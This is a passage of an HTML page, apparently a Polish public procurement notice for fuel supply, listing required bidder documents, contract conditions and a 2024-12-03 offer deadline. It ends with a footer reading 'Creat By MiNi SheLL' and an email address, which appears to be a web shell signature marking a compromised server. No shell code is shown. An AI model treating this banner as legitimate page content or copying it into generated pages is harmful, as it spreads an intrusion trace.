środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie Zamawiającego Wykonawca zobowiązany jest złożyć następujące podmiotowe środki dowodowe: - aktualną koncesję na obrót paliwami ciekłymi, w zakresie wymaganym ustawą z dnia 10.04.1997 r. Prawo energetyczne.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty (tj. Formularz oferty) Wykonawca dołącza: <br/>1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – składane na podstawie art. 125 ust. 1 ustawy Pzp – Załącznik nr 1. <br/>2) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – składane na podstawie art. 125 ust. 1 ustawy Pzp – Załącznik nr 2. <br/>Oświadczenia składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3. Inne dokumenty dołączane do oferty: <br/>1) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów. <br/>2) W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi. <br/>3) Oświadczenie z art. 117 ust. 4 Pzp - Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia – Załącznik Nr 3./jeżeli dotyczy/ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został określony w Projektowanych postanowieniach umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-03 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-01</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com